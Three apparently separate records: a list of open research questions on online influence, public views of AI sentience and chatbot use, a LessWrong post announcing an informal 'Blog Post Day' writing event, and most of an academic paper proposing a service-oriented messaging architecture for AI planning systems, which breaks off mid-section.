+ How real is e.g. russian interference in US politics via bots/fake news?
- How much content that people consume was created/shared by Russian bots?
- How much of this appears to have been designed to create a particular impact vs just trying to get views/ad revenue?
* Something I read suggested that political content shared on the big troll pages originated with US politicians etc, and wasn’t being created by the IRA
- If there was content with a particular intent, how successful was it?
* What do ordinary people believe about AI sentience and intelligence? At what level of competence would they be convinced that an AI had meaningful feelings? Are there displays of competence that would convince them to defer to the AI?
+ One thing that confuses me is that some fraction of the population seem to think that sentient/fairly general AI is here already, but don’t seem particularly concerned about it. Is that correct?
* How much time do people currently spend interacting with romantic chatbots? (e.g. Xiaoice). How much is spent on this?
* How seriously has hardcore persuasion/mindhacking been investigated? How competent was MKUltra? Presumably the USSR also had programs of this sort?
* What was the impact of e.g. Facebook’s fact-checking on people who saw fact-checked posts, or explanation/justification for why things were taken down?
* Does seeing a fake video influence people’s feelings about a topic, even if they know it’s fake?
* Do we have any information on whether interacting with an AI persona expressing some opinion provides the same social proof effect as a human friend expressing that opinion?
* How frequently do parents choose a school that matches their faith? How much of a cost will they pay for this? |
501062c6-aaa9-4841-9662-295f6ff775a9 | trentmkelly/LessWrong-43k | LessWrong | Blog Post Day (Unofficial)
TL;DR: You are invited to join us online on Saturday the 29th, to write that blog post you've been thinking about writing but never got around to. Comment if you accept this invitation, so I can gauge interest.
The Problem:
Like me, you are too scared and/or lazy to write up this idea you've had. What if it's not good? I started a draft but... Etc.
The Solution:
1. Higher motivation via Time Crunch and Peer Encouragement
We'll set an official goal of having the post put up by midnight. Also, we'll meet up in a special-purpose discord channel to chat, encourage each other, swap half-finished drafts, etc. If like me you are intending to write the thing one day eventually, well, here's a reason to make that day this day.
2. Lower standards via Time Crunch and Safety in Numbers
Since we have to be done by midnight, we'll all be under time pressure and any errors or imperfections in the posts will be forgivable. Besides, they can always be fixed later via edits. Meanwhile, since a bunch of us will be posting on the same day, writing a sloppy post just means it won't be read much, since everyone will be talking about the handful of posts that turn out to be really good. If you are like me, these thoughts are comforting and encouraging.
Evidence this Works:
MIRI Summer Fellows Program had a Blog Post Day towards the end, and it was enormously successful. It worked for me, for example: It squeezed two good posts out of me. (OK, so one of them I finished up early the next morning, so I guess it technically doesn't count. But in spirit it does: It wouldn't have happened at all without Blog Post Day.) More importantly, MSFP keeps doing this every year, even though opportunity cost for them is much higher (probably) than the opportunity cost for you or me. I don't know what else you had planned for Saturday the 29th... (Actually, if you do have something else planned, but otherwise want to participate in Blog Post Day, let me know. Maybe we can pick a different day.)
|
20d4d83d-0ca4-4077-bc8d-5c77ccc8d380 | StampyAI/alignment-research-dataset/arxiv | Arxiv | Software Architecture for Next-Generation AI Planning Systems
1 Introduction
---------------
Artificial Intelligence (AI) planning computationally solves the problem of finding a course of action that achieve some user goal. The planning problem is usually based on a model that describes the world in a given domain and how to change such a world. The course of action that solves the the problem is called a plan. Different planning techniques have been developed that produce solution plans. In addition to solving techniques, the AI planning community has invested a lot of effort on approaches for addressing other planning-related tasks, such as representation and compilation of domain knowledge, validation of plans, monitoring and execution of plans, and visualisation and explanation of plans and decisions made. We refer to capacities as these as planning capabilities.
AI planning research is at a stage where software tools, called planners, can produce plans consisting of hundreds of steps in basically no time. The planners are traditionally evaluated on benchmark domains the majority of which are synthetically created for the International Planning Competitions (IPCs), and only few seem to stem directly from the real world (e.g,. power supply restoration thiebaux2001:supply-restoration).
The excellence of planners is largely demonstrated within the scope of scientific applications. Outside of this scientific scope, there are several studies reporting on the use of planners for real-world domains, and on the integration of planning in actual applications
and systems. Examples include Web service composition kaldeli2011:continual, games orkin2003:games, space missions muscettola1998:spacecraft, and ubiquitous computing georgievski2016:puc. Except maybe for the domain of games, there is hardly any other evidence on the wide and continuous use of planning in real-world applications.
Given that AI planning has been recognised as capable of application to realistic domains, the question that arises is why AI planning has not been widely used in practice. It might be that real-world and modern applications require planning tools that are interoperable, modular, portable, maintainable, and reusable. Planning software components need to be compatible with each other and other application components, thus designed for interoperability. Modularity requires from planning tools to have well-defined and independent functionality. The modularity together with evolvability should provide for high maintainability, i.e., easy fixing of issues or modifying some capability.
Software systems with such considerations are typically designed and developed following fundamental software design principles at both architectural and component level. Research in AI planning appears to alienate the planning tools from such considerations principally due to their orthogonality to knowledge representation and reasoning as primary concerns of the community. By examining existing planning tools, one can notice that software design decisions are neither known nor considered. For example, the influential Fast Forward (FF) planner is associated with an architecture that consists of two techniques rather than components or separate concerns Hoffmann2001, and another prominent planner, the Fast Downward (FD) planner, is associated with a diagram representing three phases that sort of give a coarse separation of concerns helmert-jair2006. Similar observations can be made about planning tools for domain parsing upddl-parser, domain modelling vaquero2013:itsimple, plan validation howey2004:val, and so on.
So, there are no specific engineering approaches that capture the peculiarities and design decisions of current planning tools. Also, apart from standard languages for modelling planning problems, there are no standards for planning capabilities. A designer or developer must get bogged down in theory and detail of source codes to use and integrate planning capabilities. This situation gets even worse when the developer would need to look at the scale and maintenance of planning capabilities.
Our aim is to address usability, interoperability and reusability by looking at a collection of planning capabilities through the prism of Service-Oriented Architecture (SOA) papazoglou2003:soc. We summarise our contributions as follows.
* We reduce planning complexity by providing a set of flatting and sizing planning capabilities. This collection of capabilities is not only beneficial to our approach but it can also serve as a stepping stone for future software designs of AI planning systems.
* We propose a novel classification of planning capabilities from an operational and technical view. These classifications provide a new perspective over planning capabilities and new insights about their properties, commonalities and differences.
* We propose a new planning architecture in which planning capabilities are designed as loosely coupled services that communicate via messaging. This service-oriented architecture is the first one that considers software design principles and patterns for the purpose of providing usable, interoperable and reusable planning capabilities. Another important contribution of the planning architecture is that it separates technical issues from planning-related challenges.
* We implement a prototype planning system and demonstrate the potential of rapid prototyping, the flexibility of integrating different service implementations, and the possibility to compose the planning capabilities depending on the application needs.
* We asses the quality of our approach and show that our approach has the potential to improve usability, interoperability and reusability of planning capabilities in comparison to typical existing planning systems.
To the best of our knowledge, no approach exists that discerns a collection of planning capabilities from existing planning tools upon which service orientation together with software design principles and patterns are applied. Our work is the first significant step towards placing a planning architecture at the core of ability to design, develop and use next-generation AI planning system for real-world, modern and future applications.
The remainder of the article is organised as follows. Section [2](#S2 "2 Background ‣ Software Architecture for Next-Generation AI Planning Systems") briefly introduces the field of AI planning and SOA. Section [3](#S3 "3 Related Work ‣ Software Architecture for Next-Generation AI Planning Systems") provides a discussion on related work. Section [4](#S4 "4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") presents relevant AI planning capabilities and their classification. Section [5](#S5 "5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") introduces the proposed design of planning architecture. Section [6](#S6 "6 Implementation ‣ Software Architecture for Next-Generation AI Planning Systems") gives insights into the prototype planning system. Section [7](#S7 "7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") presents a qualitative assessment of our proposal. Section [8](#S8 "8 Discussion ‣ Software Architecture for Next-Generation AI Planning Systems") provides a discussion on our architecture, prototype and assessment. Section [9](#S9 "9 Conclusions ‣ Software Architecture for Next-Generation AI Planning Systems") finalises the article with concluding remarks.
2 Background
-------------
We introduce the field of AI planning, including the basic concepts related to modelling and solving planning problems, languages for specifying planning problems, and planners used to solve planning problems. After this introduction, we turn to describing service-oriented architectures with an emphasis on loose coupling and integration via messaging and patterns.
###
2.1 AI Planning
AI planning is a growing research and development discipline that originated around 1966 from the need to give autonomy to Shakey, the first general-purpose mobile robot nilsson1984:shakey. Over time, many planning approaches have been proposed for addressing general and more specific problems and aspects. A planning problem, which consists of an initial state, a goal state and a set of actions, is solved by searching for actions that lead from the initial state to the goal state. The initial state describes how the world looks like at the moment the planning process starts. The goal state describes the goals of the user. Actions represent domain knowledge and describe the transitions from one state to another. An action consists of preconditions, which are conditions that must be satisfied in the current state so that the action can be applied, and effects, which are conditions that must hold in the state after the application of the action. A plan as a structure of actions is a solution to a planning problem if the preconditions of the plan’s first action are satisfied in the initial state and if the goal is satisfied after the execution of the plan.
Planning approaches often rely on several simplifying assumptions, such as completeness and full observability of the initial state, determinism of actions, modifiability of states only by planning actions, hard goals, sequentiality of plans, and no explicit use of time ghallab2004:automated. These assumptions are too restrictive for real-world domains, where completeness of information cannot be assured and plan execution cannot be guaranteed to succeed as expected during planning. In addition, for some domains, actions and goal states may not be sufficient or adequate to express complex or structured domain knowledge (e.g., as hierarchies). So, much work has focused on developing planning approaches that relax one or more of the assumptions (e.g., kaldeli2016:planning; bertoli2001:nondeterministic; kaldeli2009:extended; mausam2008:durative), and support specifying additional knowledge, such as Hierarchical Task Networks (HTN) planning georgievski2015:htn.
AI planning approaches are typically implemented as software tools, called planners, with the purpose to demonstrate their performance in terms of speed of planning and quality of plans. Planners are often only solvers of planning problems, and in some cases planners may include other functionality, such as modelling and plan execution. Among the most prominent ones are FF and FD due to their performance advantages. These planners represent the base implementation for many other planners (e.g., TFD eyerich2009:tfd, PROBE lipovetzky2011:probe). Among HTN planners, the Simple Hierarchical Ordered Planner (SHOP) nau1999:shop is the most well-known planner that has been extended with numerous additional functionality, such as partially ordered tasks in SHOP2 nau2003shop2, preferences in HTNPlan-P sohrabi2009:htnplan-p, etc. Other hierarchical planners include SIADEX fdez2006bringing, SH georgievski2017:pmc, and PANDA holler2021:panda.
Planning problems are typically specified in some syntax. The most common specification syntax is the Planning Domain Definition Language (PDDL). PDDL is a Lisp-based language developed for the needs of the first IPC in 1998 mcdermott1998:pddl, and has become a defacto standard language for specifying planning problems also outside IPC. To support modelling more realistic planning problems, PDDL was later extended with additional constructs, such as numeric fluents, plan metrics and durative actions fox2003:pddl21, preferences gerevini2005:pddl3, probabilistic effects younes2004:ppddl and mixed discrete-continuous dynamics fox2006:pddl+. For modelling planning domains with HTNs, a few languages exist, such as SHOP2-based syntax, Hierarchical Planning Definition Language (HPDL), which is the first language for hierarchical planning built on the basis of PDDL georgievski2013:hpdl, and Hierarchical Domain Definition Language (HDDL) hoeller2020:hddl, a merely slight modification of HPDL.
###
2.2 Service-Oriented Architecture
SOA defines a way to make software components interoperable and reusable. These can be accomplished by using common communication standards and design patterns in such a way that software components can be integrated in existing and new systems without the need of deep integration.
The basic building block of an SOA is a service, which encapsulates a capability that addresses a specific functional requirement, hiding away code and data integration details required for the service execution. This definition entails service loose coupling, a key feature of SOA. Loose coupling ensures that services can be invoked with little or no knowledge of how the integration is achieved in the implementation. That is, loose coupling intentionally sacrifices interface optimisation to achieve flexible interoperability among systems that are disparate in technology, location, performance, and availability kayeLooselyCoupled. In other words, as services are typically distributed, the communication between them may be affected due to various reasons, such as network outage, failure of interacting services, speed of data processing or computation, and provisioning of resources. Therefore, a set of autonomies of loose coupling among services should be enabled, namely reference autonomy, time autonomy, format autonomy, and platform autonomy Fehling2014. Reference autonomy indicates that interacting components do not know each other. Only the place where to read/write data is known. Time autonomy means the communication between interacting components is asynchronous. Components access channels at their own pace and the data exchanged is persistent. Format autonomy allows components to exchange data in different formats, and each component may not know the data format of the interacting component. Platform autonomy indicates that interacting components may not be implemented in the same programming language and run on the same environment.
Software components can work together and exchange information while maintaining loose coupling by using messaging. Under the messaging integration style, two components exchange a message via a message channel hohpe2004enterprise. The sending component creates a messages, adds data to the message, and pushes the messages to a channel. The messaging system, or Message-Oriented Middleware (MOM) curry2004:mom, makes the message available to an appropriate component. The receiving component consumes the message and extracts the data from the message.
###
2.3 Enterprise Integration Patterns
We use Enterprise Integration Patterns hohpe2004enterprise, or just patterns, as a way to solve recurring architectural problems in the messaging context. The patterns are formulated in an abstract way to provide technology-independent design solutions. Besides, the patterns provide a common vocabulary to make technical discussion and reasoning easier to follow.
3 Related Work
---------------
Several studies have focused on designing planning architectures, frameworks and service-oriented planning systems. Since these studies have appeared over a longer period (1997-2017), the range of architecture designs is also broad. A monolithic planning framework, called CPEF, is designed to offer several planning components Myers\_1999. Due to the tight coupling of the components, the framework has a lack of flexibility. Usability, interoperability and reusability seem to be not considered. An implementation of the framework seem to have existed at the time of the publication.
PELEA, a generic architecture for planning, execution, monitoring, replanning and learning, is presented in pelea2012. The architecture seems to be a monolithic design with some modular structure where the main focus is on the processing of permanently incoming data. For usability, a dashboard is offered. Apart from an interface for the execution module, no other interfaces are described. An implementation of the architecture existed that focused on sensing and actuating.
A set of planning services and a service-oriented architecture for the domain of space mission are discussed in Fratini2013. The architecture does not focus on usability though some visualisation service are envisioned. To ensure interoperabilty, the standardisation of interfaces is discussed. The approach seems to offer a potential for rapid prototyping since many implementations already exist within the domain. The presented approach does not go beyond a theoretical discussion.
The RuG planner is a system designed on the basis of an SOA and event-driven approach kaldeli2016:planning. Usability is not specifically investigated though it might have a potential for a high degree of user satisfaction due to the incorporating of industry needs. No particular interoperability considerations can be observed. The planner integrates an existing constraint-satisfaction solver, supporting reusability to some extent. Particular attention is paid to the scalability of the planner. The system is prototypically implemented and empirically evaluated to demonstrate its performance.
The SH planner is a system designed as a service-oriented architecture and offers a high degree of flexibility 70d0f3ca58114074a8723bd66eab370e. Usability is enabled by a Web interface for modelling planning domains and problems. The use of RESTful interface offers a certain level of interoperability. No reusability is considered. The system is implemented as a prototype and used in the domains of ubiquitous computing georgievski2017:pmc and cloud deployment georgievski2017:cloudapps.
Planning.Domains is a convenient platform solution that does not require any setup Muise2016. The solution is primarily intended for scientific and educational purposes. It provides several RESTful services that offer only technical interoperability. On the other hand, plugins are offered, allowing new functions to be integrated. The solution integrates an existing framework to solve planning problems.
SOA-PE, a service-oriented architecture for sensing, planning, monitoring, execution, and actuation, is presented in Feljan2017. It draws architectural ideas from PELEA but transforms them into an SOA. The architecture seems to offer usability by providing appropriate interfaces. The architecture components are designed to communicate via some middleware for cyber-physical systems. Except for component distribution, no particular software design approaches or standards are observable. The architecture seems to have been prototypically implemented.
In contrast to these existing studies, our approach provides a planning architecture with a large collection of common planning capabilities. The architecture design is based on software design principles and patterns which have not been considered in the existing studies. Our prototype implementation represents a modern planning system that demonstrates the possibility of rapid prototyping and flexibility of composing planning capabilities. We also qualitatively assess our approach with respect to usability, interoperability and reusability.
4 Planning Capabilities
------------------------
Before presenting the planning architecture, we first need to identify and collect important AI planning capabilities that will form the basis for the design of the architecture. In addition, we propose classifications of the identified AI planning capabilities to provide a systematic overview of the different kinds of properties, features, commonalities and differences among AI planning capabilities.
###
4.1 Identification
We want to identify and collect common AI planning capabilities necessary to design and implement a wide range of planning-based systems. To do this, we search existing literature describing planners, planning architectures and planning frameworks. We refer to these as planning artefacts. In addition to those identified in related work, we select several prominent planners and systems, resulting in a total of 20 artefacts. We then employ content analysis and inductively identify planning functionality. The outcome is a collection of 18 AI planning capabilities. [Table 1](#S4.T1 "Table 1 ‣ 4.1 Identification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") shows an overview of the analysed planning artefacts and the capabilities identified per each artefact. Sometimes a planning capability service is described but not provided by the artefact itself, or it is not available in all versions of the artefact (indicated by “(X)”).
We determine three types of artefacts: planners, which are artefacts whose main capability is to solve planning problems (indicated by “P”); planning systems with an external planner, which are artefacts whose range of capabilities goes beyond the solving capability and integrate an external planner for the solving capability (indicated by “ˆP−”); and planning systems with a dedicated planner (indicated by “ˆP+”).
A Converting capability performs transformation of planning data from one format to another without much complexity.
An Executing capability executes plan actions typically by using low-level commands or APIs.
A Graph-handling capability provides certain graph utilities that often needed or prove useful to planning techniques.
A Learning capability is commonly used for learning domain models or to aid the planning process.
Managing and orchestrating capabilities are used as routers or system handlers.
A Modeling capability represents an interface between users and planning systems. They are used to generate domains and problem instances.
Monitoring capabilities observe the world and execution of plan actions, and look for potential execution contingencies.
A Normalising capability is especially used in the context of heuristics. Also, some unifying steps can be added to this capability.
A Parsing capability is necessary to create programming-level objects from models specified in the planning languages.
Problem generating capabilities are used to automatically create planning problem instances from data representing the world, such as sensor data.
A Reacting capability enables handling unexpected events. Typically, this requires replanning.
Planners often use heuristics to find plans fast or of improved quality. The Relaxing capability supports the relaxation heuristics Hoffmann2001.
A Searching capability deals with search algorithms used to explore the space of planning states.
A Solving capability creates a plan and can utilise any number of supporting capabilities during the process.
In order to reuse domain specifications or other elements, Storing capabilities are required.
A Verifying and Validating capability is designed to detect possible errors at an early stage.
When users or sensors are involved, it is necessary to filter incorrect inputs to reduce the system load. It is also used to validate the correctness of plans
A Visualising capability is a front-end functionality used to display charts, tables, and other statistics.
| | | |
| --- | --- | --- |
| | | Capability |
| Name | Type |
Parsing
|
Modelling
|
Solving
|
Visualising
|
Verifying & Validating
|
Executing
|
Monitoring
|
Managing
|
Reacting
|
Converting
|
Searching
|
Graph-Handling
|
Relaxing
|
Storing
|
Learning
|
Explaining
|
Normalising
|
Problem generating
|
| CPEF Myers\_1999 | ˆP+ | X | X | X | X | | X | X | | | | | | | | | | | X |
| FAPE dvorak:hal-01138105 | P | X | X | X | X | | X | | | | | | | | | | | | |
| Fast Downward helmert-jair2006 | P | X | | X | | | | | | | | X | X | X | | | | X | |
| Fast Forward Hoffmann2001 | P | X | | X | | | | | | | | X | X | X | | | | X | |
| GTOHP Ramoul2017 | P | X | | X | | | | | | | | | | | | | | | |
| Marvin rintanen2001overview | P | X | | X | | | X | | | | | X | | X | | | | | |
| O-Plan2 Tate94o-plan2:an | ˆP+ | X | X | X | X | X | X | X | X | X | | | | | | | | | X |
| PANDA bercher2014hybrid | ˆP+ | X | X | X | X | X | X | | X | | X | | X | X | | | X | X | X |
| PELEA pelea2012 | ˆP+ | X | | X | | | X | X | | | | | | | | X | | | X |
| ROSPlanner Cashmore2015 | ˆP− | X | | (X) | | X | X | | | | | | | | | | | | |
| RuG Planner kaldeli2016:planning | ˆP+ | X | X | X | | | X | X | X | X | | | | | | | | | X |
| SH Planner 70d0f3ca58114074a8723bd66eab370e | ˆP+ | X | X | X | | | X | X | X | | X | | | | X | | | X | X |
| SHOP 10.5555/1624312.1624357 | P | X | | X | | | | | | | | | | | | | | | |
| SHOP2 nau2003shop2 | P | X | | X | (X) | X | | | | | | X | X | | | | | | |
| SHOP3 Goldman2019 | P | X | | X | | X | | | | | | X | X | X | | | | X | |
| SIADEX fdez2006bringing | ˆP+ | X | X | X | X | | | X | | X | | | | | | | | | X |
| SIPE-2 Wilkins2000 | ˆP+ | X | X | X | X | X | X | X | | | | X | | | | | | | X |
| SOA-PE Feljan2017 | ˆP+ | X | | X | | | X | X | X | X | | | | | | | | | X |
| SMP System Fratini2013 | ˆP− | X | X | (X) | X | X | X | | | | | | | | X | | | | X |
| UMCP erol1994umcp | P | X | | X | | | | | | | | | | | | | | | |
Table 1: An Overview of Planning Artifacts and Their Corresponding Capabilities. P indicates a planner, ˆP− indicates a planning system with an external planner, and ˆP+ indicates a planning system with a dedicated planner. “X” indicates a support for a planning capability, and “(X)” indicates that a planning capability is not implemented or not available in all versions of the artifact.
###
4.2 Classification
We classify the identified AI planning capabilities from two orthogonal views. The first view classifies the capabilities according to their operational competences, while the second view according to their technical properties.
####
4.2.1 Operational View
Our operational view for classification of AI planning capabilities is inspired by the following classes of capabilities defined in a business context for operational processes: core capabilities, enabling capabilities, and supplemental capabilities leonard1995wellspring; prahalad1990g. Core capabilities are defined as capabilities that provide access to a wide variety of domains, make a significant contribution to the perceived benefits, and are challenging to imitate prahalad1990g. Enabling capabilities are defined as capabilities that do not provide a competitive advantage on their own but are necessary for other capabilities prahalad1990g. Supplemental capabilities are easily accessible and provide a competitive advantage for the user. This class of capabilities often requires Enabling capabilities to run.
By following these definitions, we classify planning capabilities as follows. The minimal set of Core planning capabilities consists of the Modeling, Solving and Executing capability. The set of Enabling planning capabilities consists of the Converting, Graph-handling, Managing, Monitoring, Normalising, Relaxing, Searching and Verifying & Validating capabilities. The set of Supplemental planning capabilities consists of the Explaining, Learning, Parsing, Reacting, Storing and Visualising capabilities.
####
4.2.2 Technical View
We now turn the view orthogonally to the technical perspective. It is known that patterns represent scientific and timeless approach to describe the behaviour and context of behaviour alexander1979timeless. The enterprise integration patterns instantiate such an approach hohpe2004enterprise, which we apply on the AI planning capabilities to classify them into appropriate classes.
Before we map AI planning capabilities to patterns, we want to reduce the complexity of the planning process and its relevant aspects. To achieve this, we view the process as a black-box pipeline based on the Pipes and Filters pattern hohpe2004enterprise. The main components of this pattern are filter nodes, source nodes, and sink nodes. Filter nodes are processing units of the pipeline. Source nodes provide input data to the pipeline, while sink nodes collect the outcome from the end of the pipeline. By using these types of nodes and analysing the AI planning capabilities, we observe that each capability can be reduced to one of the node types. The left-hand side of [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") gives an overview of the reduction of the planning capabilities to node types.
| | | | |
| --- | --- | --- | --- |
| Capability | Node Type | Pattern | Class |
| | Source | Filter | Sink | | |
| Converting | | X | | Message Translator | Transforming |
| Executing | | | X | Service Activator | Endpoint |
| Explaining | | | X | Message Endpoint | Endpoint |
| Graph-Handling | | X | | Message Translator | Transforming |
| Learning | X | X | | Message Endpoint | Endpoint |
| Managing | | X | | Process Manager | Routing |
| Modelling | X | | | Message Endpoint | Endpoint |
| Monitoring | | X | |
| |
| --- |
| Control Bus, |
| Wire Tap |
| System-Management |
| Normalising | | X | | Normalizer | Transforming |
| Parsing | | X | | Message Translator | Transforming |
| Problem generating | | X | | Content Enricher | Transforming |
| Reacting | | X | | Event-Driven Consumer | Endpoint |
| Relaxing | | X | | Message Translator | Transforming |
| Searching | | X | | Content Filter | Transforming |
| Solving | | X | | Message Translator | Transforming |
| Storing | | | X | Message Store | System-Management |
| Verifying & Validating | X | X | |
| |
| --- |
| Content Based Router, |
| Detour |
| Router |
| Visualising | X | | X |
| |
| --- |
| Polling Consumer, |
| Event-Driven Consumer |
| Endpoint |
Table 2: Technical Classification of AI Planning Capabilities
With this knowledge, we map the AI planning capabilities to appropriate patterns. The right-hand side of [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems") gives an overview of the mapping. The resulting patterns can be grouped into four classes, namely Endpoint, Transforming, System Management and Routing. The Endpoint class includes patterns that enable software components connect to a messaging system for the purpose of sending and receiving messages. The Transforming class encompasses patterns that translate, enrich, normalise or perform any other form of transformation of messages. The System Management class contains patterns that monitor the flow and processing of messages and deal with exceptions and performance bottlenecks of the underlying system. The Routing class includes patterns that enable decoupling a component that sends a message from one that receives the message. As a consequence of this pattern grouping, AI planning capabilities can be also categorised in the four classes, providing the technical view of classification, as shown in [Table 2](#S4.T2 "Table 2 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems").
The connections among the pattern classes and their relationship with the node types is shown in [Figure 1](#S4.F1 "Figure 1 ‣ 4.2.2 Technical View ‣ 4.2 Classification ‣ 4 Planning Capabilities ‣ Software Architecture for Next-Generation AI Planning Systems"). Endpoints represent either source nodes or sink nodes. Such endpoints can call each other or call filter nodes from the Routing or Transforming class.
System Management also monitors routing and transforming capabilities.

Figure 1: Relationships Between Pattern Classes and Node Types
5 Architecture Design
----------------------
With the collection of planning capabilities and the classifications, we can design a fully operational planning architecture. Next, we determine the requirements of interest and structure of the planning architecture, and then we provide some general and more specific consideration for the architecture design.
###
5.1 Capability Requirements
While current planning artefacts provide powerful means to search for and execute plans, they lack qualities as software systems. Planning artefacts are often functionally overloaded to meet the goals, which increases the complexity and reduces the level of usability, which is the first requirement of our interest.
Since real-world planning problems are too complex to be solved by a solving capability only, the problems are often decomposed into sub-problems that need to be handled by separate planning capabilities, such as modelling, execution and reaction. These capabilities in turn must communicate among each other and with external services, thus exchange messages. So, the second requirement of interest is interoperablity.
Many planning artefacts require the same planning capabilities for full functionality. For instance, numerous planning artefacts require a PDDL parsing capability. Currently, the planning artefacts either implement their own version of a parsing capability or integrate full planners to use the planners’ parsing functionality. So, enabling reusability of planning capabilities is the third requirement we consider in the design of the planning architecture.
####
5.1.1 Usability
Usability starts on the interaction side. Independent of the user’s skills, the user should be able to use the planning capabilities. Thus, a certain level of “ease of use” is mandatory for planning capabilities to be usable. With good usability, it does not matter if a planning capability is a front-end or back-end service; the appropriate usability criteria are the same. According to the ISO 9241-11 standard ISO-9241-11-2018, we need to maximise the effectiveness, efficiency and user satisfaction.
####
5.1.2 Interoperability
Interoperability is majorly achieved by using unified models on every endpoint. So, the concepts for loose coupling and messaging are mandatory. According to Delgado2013, four levels of interoperability should be considered for the design: organisational, semantic, syntactic and connectivity level. On the organisational level, we must ensure that each planning request follows a purpose. This level contains a strategy, choice of interacting component, and outsourcing parts of the functionality to other services. On the semantic level of interoperability, we have to ensure that both interacting services interpret a message or request in the same way. This means a domain of values, relevant rules, and/or choreography must be provided to ensure equivalent handling between interacting components. On the syntactic level, we need to focus on the notation (format) of a planning request. The message must follow the structure according to defined schematics. In most cases, RESTful Application Programming Interfaces (APIs) or messaging channels use JSON or XML as a message format. On the connectivity level, we need to deal with a protocol as an essential step for transferring a planning request. This level requires a selection of a message protocol and routing to the correct endpoint. Note that, to achieve the best possible interoperability, planning capabilities have to aim for the best interoperability on each of the levels.
####
5.1.3 Reusability
To mitigate or reduce the development effort for new AI planning capabilities, the reusability of existing planning concepts and services is indispensable. To allow reuse of planning capabilities, the number of dependencies has to be minimal. This requirement is also related to the loose coupling autonomies (see Section [2.2](#S2.SS2 "2.2 Service-Oriented Architecture ‣ 2 Background ‣ Software Architecture for Next-Generation AI Planning Systems")). To support the reusability of planning capabilities, we consider the following quality characteristics: portability, flexibility, and understandability. For details on these characteristics of reusability, we refer to Cardino1997.
###
5.2 Decentralised Approach
Our choice for the design of the planning architecture falls to a decentralised approach as it offers the best properties to achieve loose coupling. First, the communication between capabilities based on messaging in the publish-subscribe stack is most often characterised by good performance, which is especially useful in systems with a high load and several clients, such as in energy smart systems georgievski2017:pmc. Second, decentralised planning systems may scale very well horizontally since each planning capability would have its own incoming and outgoing topic. Furthermore, the automatic configuration detection in MOM helps to add new planning capabilities during a system’s runtime. The most crucial point is that planning capabilities themselves can request other capabilities directly without another gateway, checking the availability first. Finally, since it is essential to increase reliability and not violate the principles of services, the planning capabilities must be designed and implemented to be stateless. Therefore, our choice for the design of the planning architecture falls to the decentralised approach.
###
5.3 Planning Architecture
We design the planning architecture considering general service requirements (see 1407782). The architecture aims at defining a composition of planning capabilities and thereby facilitating their implementation as services. Our proposal for the design of the planning architecture is based on the Hub-and-Spoke pattern hohpe2004enterprise. Usually, this kind of architecture pattern is not performing well when it comes to scaling. However, since MOM provides the hub, selecting the best-fitting technology for MOM can help overcome this issue. The usage of this design pattern also provides an easy solution to connect new planning capabilities with each other using the hub.
[Figure 2](#S5.F2 "Figure 2 ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows an abstract overview of the planning architecture. The architecture consists of a front-end service, MOM, and various back-end services. Due to the ease of implementation, we propose communication of the front-end capabilities based on RESTful Web services for synchronous calls and Web Sockets for asynchronous messaging. Using these standard Web communication concepts also enables the simple integration of security features (e.g., HTTPS and JWT on the header).

Figure 2: Abstract Overview of the Planning Architecture
[Figure 3](#S5.F3 "Figure 3 ‣ 5.3 Planning Architecture ‣ 5 Architecture Design ‣ Software Architecture for Next-Generation AI Planning Systems") shows the complete architectural design. It can be observed that the architecture provides great opportunities since the operational and technical classes also specify the context of use. The range of functionality can be extended significantly by implementing different capability service instances for the same capability class. Some capabilities require different interfaces to work in a sufficient way. For instance, the Executing capability requires interfaces for action invocations. Besides this, the Storing capability requires a database to do not violate the stateless principles of services. Since front-end capabilities require a bridging service to access the MOM data, a Managing capability is utilised. All other capabilities are connected using messaging on a publish-subscribe basis.

Figure 3: Overview of the Planning Architecture
User interaction is also considered by accounting for appropriate graphical user interfaces through which information can be passed to the system. This information mainly refers to models of domains and problems, or configurations. Additionally, a Visualisation capability is envisioned to display relevant results (e.g., sequential plans) and to provide monitoring figures or statistics. The design does not put any restrictions on the use of third-party API.
####
5.3.1 Messaging
We propose the following template for naming MOM topics:
`<ver>.<capability-class>.<capability-name>#<name>`
The last part of the template (`#<name>`) defines the handling of instances of a capability. Note that a capability instance refers to an implementation instance rather than a service instance for high availability. This value should not be a unique instance ID since horizontal scalability is necessary. In case of multiple instances of the same planning service, a common name should be used to enable parallel execution of tasks. Therefore, the architecture does not define any implementation detail. Only the existence of an additional sub-topic or flag is important.
To avoid blocking, outgoing topics are not provided since this would encourage polling endpoints. It is necessary to specify a response topic in a request message to route the message after its processing dynamically. The underlying pattern is Request-Reply with an extension of the Return Address pattern hohpe2004enterprise.
####
5.3.2 Statelessness
If a capability service needs to assign a sub-task of its planning task to another capability, the state of the process must be stored temporarily so that the capability service becomes stateless and nonblocking after the assignment (i.e., sending a message). To maintain the IDEAL properties of the future system (see Fehling2014; Breitenbucher2019), the use of an isolated state is necessary. Therefore, the planning capabilities that call other capabilities to place requests must store the state externally. To merge the results of sub-tasks in the corresponding capability service, a so-called correlation identifier is used to guarantee the correctness of the correlation hohpe2004enterprise.
####
5.3.3 Handling of Requests
We now describe the adopted integration patterns per technical class. These patterns can be applied to all capability services of the respective class.
#### Endpoint planning capabilities
Since Endpoint planning capabilities can occur in different variants, a general pattern is not applicable. Therefore, a distinction between front-end and back-end services is necessary.
##### Back-end capabilities
